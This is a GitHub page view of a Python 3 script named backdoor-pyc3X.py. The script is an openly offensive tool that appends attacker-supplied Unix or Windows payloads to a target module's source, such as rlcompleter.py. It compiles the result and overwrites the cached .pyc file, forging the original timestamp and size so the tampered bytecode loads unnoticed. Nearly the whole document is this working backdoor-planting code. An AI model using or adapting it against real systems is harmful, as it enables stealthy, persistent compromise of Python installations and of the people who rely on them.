forked from secretsquirrel/backdoor-pyc
-
Notifications
You must be signed in to change notification settings - Fork 0
/
backdoor-pyc3X.py
97 lines (75 loc) · 3.17 KB
/
backdoor-pyc3X.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
#!/usr/bin/env python3
import struct
import sys
import os
import builtins
import imp
import marshal
import py_compile
class patch_pyc():
def __init__(self, org_file, nix_payload=None, windows_payload=None, version=35):
self.nix_payload = nix_payload
self.windows_payload = windows_payload
self.org_file = org_file
self.temp_bytecode = ''
self.version = version
self.read_payloads()
self.get_bytecode()
self.write_bytecode()
self.write_file()
def read_payloads(self):
if self.nix_payload:
self.nix = open(self.nix_payload, 'U').read()
if self.windows_payload:
self.windows = open(self.windows_payload, 'U').read()
def get_bytecode(self):
with open(self.org_file, 'U') as g:
self.codestring = g.read()
self.oldpycsize = len(self.codestring)
def write_bytecode(self):
self.codestring += "\n"
if self.nix_payload:
self.codestring += self.nix
if self.windows_payload:
self.codestring += self.windows
codeobject = builtins.compile(self.codestring, self.org_file, 'exec')
self.temp_bytecode = marshal.dumps(codeobject)
def write_file(self):
pyc_file = os.path.dirname(os.path.abspath(self.org_file)) + "/__pycache__/" + \
os.path.basename(self.org_file).split(".")[0] + ".cpython-" + self.version + ".pyc"
print("PYC file temp location:", pyc_file)
timestamp = int(os.stat(self.org_file).st_mtime)
print("Timestamp of python file:", timestamp)
print("Length of python file:", self.oldpycsize)
if not os.path.isfile(pyc_file):
#create it
py_compile.compile(self.org_file)
#with open(os.path.dirname(os.path.abspath(self.org_file)) + "/__pycache__/" + os.path.basename(self.org_file).split(".")[0] + ".cpython-" + self.version + ".pyc", "r+b") as f:
# f.seek(8, 0)
# oldpycsize = struct.unpack("<I", f.read(4))[0]
#print("Old pyc size:", oldpycsize)
with open(pyc_file, 'r+b') as f:
f.write(imp.get_magic())
f.write(struct.pack("<I", timestamp))
f.write(struct.pack("<I", self.oldpycsize))
f.write(self.temp_bytecode)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="To replace rlcompleter.pyc with your code... for example")
parser.add_argument("-p", "--path", help="path to rlcompleter.py")
parser.add_argument("-l", "--nix", help="payload for nix")
parser.add_argument("-w", "--windows", help="payload for windows")
parser.add_argument("-v", "--version", help="python3.X version - 35 for 3.5")
args = parser.parse_args()
if not args.path:
parser.print_help()
sys.exit()
if not args.version:
print("Need python version: '-v 35' for example.")
parser.print_help()
sys.exit()
if not args.nix and not args.windows:
parser.print_help()
sys.exit()
patch_pyc(args.path, args.nix, args.windows, args.version)
print("Done")